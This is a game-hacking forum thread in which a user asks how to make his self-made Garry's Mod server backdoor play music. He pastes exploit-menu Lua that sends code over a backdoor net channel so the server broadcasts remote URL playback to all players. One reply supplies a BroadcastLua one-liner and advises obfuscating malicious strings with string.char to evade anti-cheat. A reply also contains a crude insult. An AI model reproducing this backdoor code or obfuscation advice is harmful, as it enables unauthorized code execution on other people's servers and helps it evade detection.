Results 1 to 4 of 4

Hybrid View

  1. #1
    Bilaboz's Avatar
    Join Date
    Apr 2017
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0

    Question Add music in a backdoor

    Hello, i made my own backdoor and i want to play music in the server when i type "music 1" "music 2" ... In th console.

    I found this in the smenu :

    Code:
    local Macro = vgui.Create( "DButton" ) 
    Macro:SetParent(Musiques)
    Macro:SetPos( 20, 30 )
    Macro:SetTextColor( Color(255, 255, 255, 255) )
    Macro:SetSize( 110, 25 )
    Macro:SetText( "Musique - Be Friend" )
    Macro.Paint = function()
    surface.SetDrawColor(29, 39, 55)
    surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
    surface.SetDrawColor( 32, 80, 154 )
    surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
    end
    Macro.DoClick = function()
    net.Start(netKey)
    net.WriteString("BroadcastLua([[sound.PlayURL( \"https://loadingscrren.000webhostapp.com/BE%20FRIENDS.mp3\", \"mono\", function()end )]])")
    net.WriteBit (1)
    net.SendToServer()
    chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Smenu.exe", "] ", Color( 255, 255, 255 ), "Musique - Be Friend activ�" )
        SploitNotify("Musique - Be Friend ")
        surface.PlaySound("buttons/blip1.wav") 
    end
    etc

    How do i add music in my backdoor ?

    PS : I'm looking for a method to obfuscate.

    Thanks !

  2. #2
    aSTeya's Avatar
    Join Date
    Jul 2018
    Gender
    male
    Posts
    4
    Reputation
    10
    Thanks
    1

    Unhappy

    I don't know?
    Last edited by aSTeya; 10-24-2018 at 10:25 PM.

  3. #3
    The Beast123's Avatar
    Join Date
    Dec 2014
    Gender
    male
    Posts
    87
    Reputation
    18
    Thanks
    30
    My Mood
    Happy
    Quote Originally Posted by aSTeya View Post
    I don't know?
    Why did you post then hairy ass mong?

  4. #4
    catena's Avatar
    Join Date
    Nov 2018
    Gender
    male
    Posts
    3
    Reputation
    10
    Thanks
    0
    Code:
    BroadcastLua([[sound.PlayURL( \"https://www.urMUSIChere.com/music.mp3", \"mono\", function()end )]])
    Running something like that on the server should get desired effect.
    You could o b f u s c a t e by replacing m a l i c i o u s strings with string.char equivilent, most anti cheat would go run a blind eye or :�

Similar Threads

  1. [Solved] How to add music for specific portals/realms etc.
    By BurgerLoverMx in forum Realm of the Mad God Private Servers Help
    Replies: 4
    Last Post: 08-23-2016, 11:09 AM
  2. [Help Request] How to add Music in Doomed Source
    By Suki91 in forum Realm of the Mad God Private Servers Help
    Replies: 1
    Last Post: 12-24-2015, 05:39 AM
  3. Can't add music to camtasia?
    By owned1257 in forum General
    Replies: 5
    Last Post: 05-23-2011, 08:10 AM
  4. How to add Music to a form
    By Lolland in forum Visual Basic Programming
    Replies: 4
    Last Post: 11-26-2009, 04:46 PM
  5. Add music?
    By xxhealxx in forum Spammers Corner
    Replies: 2
    Last Post: 08-08-2008, 02:12 PM